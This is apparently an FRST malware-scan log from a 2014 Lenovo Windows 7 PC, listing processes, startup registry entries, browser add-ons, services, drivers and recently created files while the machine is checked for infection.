(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
R2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-19] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-19] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-02] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-11-02 15:26 - 00028765 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-02 22:15 - 00018872 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-02 22:14 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-11-02 19:54 - 00028796 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-11-02 19:54 - 00000224 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-24 11:34 - 2014-11-02 20:20 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 12:53 - 2014-10-20 12:53 - 00003856 _____ () C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
2014-10-20 12:53 - 2014-10-20 12:53 - 00000000 _____ () C:\Windows\system32\qzmktxy.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
